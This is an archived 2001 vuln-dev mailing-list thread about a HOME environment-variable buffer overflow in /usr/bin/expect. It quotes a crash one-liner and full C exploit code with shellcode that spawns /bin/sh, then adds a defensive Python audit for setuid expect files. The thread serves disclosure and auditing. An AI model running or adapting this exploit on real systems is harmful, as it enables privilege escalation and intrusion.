Vulnerability Development mailing list archives

Re: [Fwd: [Fwd: Returned post for bugtraq () securityfocus com]]
From: "Kevin J. Menard, Jr." <kmenard () WPI EDU>
Date: Tue, 5 Jun 2001 13:48:58 -0400

Hey KF,

    This is pretty much the same thing George Guninski reported to BugTraq.  You
    should give people proper credit where due.

-- 
 Kevin

Tuesday, June 05, 2001, 5:04:23 AM, you wrote:


K> I have found an overflow in and coded the exploit code for several
K> versions of /usr/bin/expect... on SCO , linux, and BSD variants. I am
K> unable to think of a situation where this would be useful due to the
K> fact that expect is not suid...can anyone help me determine if this is
K> exploitable to obtain root? Perhaps a suid expect script could be
K> exploited? or maybe something like suid kppp which calls expect as a
K> helper program?

K> [root () linux elguapo]# export HOME=`perl -e 'print "A" x 433'`
K> [root () linux elguapo]# expect
K> Segmentation fault (core dumped)

K> -Kevin Finisterre
K> dotslash () snosoft com
K> [attachment: expect.c]

K> //krfinisterre () checkfree com or dotslash () snosoft com
K> //this is output from my brute script...
K> //722
K> //Stack pointer: 0xbffffa18
K> //       Offset: 0x2d3
K> //  Return addr: 0xbffff745
K> //stack/brute.sh: line 11:  2190 Illegal instruction     (core dumped)
K> $3
K> $L
K> //723
K> //Stack pointer: 0xbffffa18
K> //       Offset: 0x2d4
K> //  Return addr: 0xbffff744
K> //sh-2.04#
K> //note that I was root when I ran this ... expect is not suid

K> #define BUFFERSIZE 533

K> unsigned long sp(void)
K> {
K>         __asm__("movl %esp, %eax");
K> }

K> int main(int argc,char **argv)
K> {
K>   char hell[] =
K>         "\x29\xc0"
K>         "\x29\xc0"
K>         "\xb0\x47"
K>         "\x29\xdb"
K>         "\xb3\x0c"
K>         "\x89\xd9"
K>         "\xcd\x80"
K>         "\x5e"
K>         "\x29\xc0"
K>         "\x88\x46\x07"
K>         "\x89\x46\x0c"
K>         "\x89\x76\x08"
K>         "\xb0\x0b"
K>         "\x87\xf3"
K>         "\x8d\x4b\x08"
K>         "\x8d\x53\x0c"
K>         "\xcd\x80"
K>         "\xe8\xe3\xff\xff\xff"
K>         "\x2f\x62\x69\x6e\x2f\x73\x68";
K>         int i;
K>         int offset;
K>         long esp;
K>         long ret;
K>         long *addr_ptr;
K>         char *buffer, *ptr;
K>         offset = atoi(argv[1]);
K>         esp = sp();
K>         ret = esp-offset;

K>         if(!(buffer = malloc(BUFFERSIZE)))
K>         {
K>                 printf("oops\n");
K>                 exit(-1);
K>         }

K>         ptr = buffer;
K>         addr_ptr = (long *)ptr;
K>         for (i=0; i<BUFFERSIZE; i+=4)
K>                 *(addr_ptr++) = ret;

K>         for (i=0; i<BUFFERSIZE/2; i++)
K>                 buffer[i] = '\xeb02';

K>         ptr = buffer + ((BUFFERSIZE/2) - (strlen(hell)/2));
K>         for(i=0; i<strlen(hell); i++)
K>                 *(ptr++) = hell[i];

K>         buffer[BUFFERSIZE-1] = 0;

K>         setenv("HOME", buffer, 1);
K>         execlp("/usr/bin/expect", 0);
K> }


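The question the quoted post raises (is there a setuid expect script, or a setuid helper such as kppp that runs expect, which would turn this non-suid overflow into a root issue) is one an administrator can answer by auditing the host. The following is an added example, not part of the original post or of the expect project: it walks a directory tree for setuid/setgid regular files whose shebang names expect or that embed the /usr/bin/expect path, and builds constructed sample files so it runs offline; the EXPECT_PATH value and the sample file names are assumptions.

```python
import os
import stat
import tempfile
# Interpreter path as named in the post; adjust for hosts that install expect elsewhere.
EXPECT_PATH = b"/usr/bin/expect"
PRIV_BITS = stat.S_ISUID | stat.S_ISGID

def expect_usage(path):
    """'expect-script' if the shebang line names expect, 'references-expect' if
    EXPECT_PATH appears in the contents (a helper call like the kppp case), else None."""
    try:
        with open(path, "rb") as f:
            data = f.read()
    except OSError:
        return None
    first_line = data.split(b"\n", 1)[0]
    if first_line.startswith(b"#!") and b"expect" in first_line:
        return "expect-script"
    return "references-expect" if EXPECT_PATH in data else None

def audit_tree(root):
    """Sorted (path, kind) pairs for setuid/setgid regular files under root that involve expect."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & PRIV_BITS:
                kind = expect_usage(path)
                if kind is not None:
                    findings.append((path, kind))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample files (not a real system) so the audit runs offline."""
    root = tempfile.mkdtemp(prefix="expect-audit-")
    samples = {  # name: (contents, mode)
        "suid_script": (b"#!/usr/bin/expect -f\nspawn true\n", 0o4755),
        "plain_script": (b"#!/usr/bin/expect -f\nspawn true\n", 0o755),
        "suid_helper": (b"\x7fELF dialer that runs /usr/bin/expect\x00", 0o4755),
        "suid_other": (b"\x7fELF unrelated program\x00", 0o4755),
    }
    for name, (body, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as f:
            f.write(body)
        os.chmod(path, mode)
    return root
```

On a real host, call audit_tree("/") as root and review each finding; only the privileged entries matter for the escalation question, and the plain (non-setuid) expect scripts are deliberately left out.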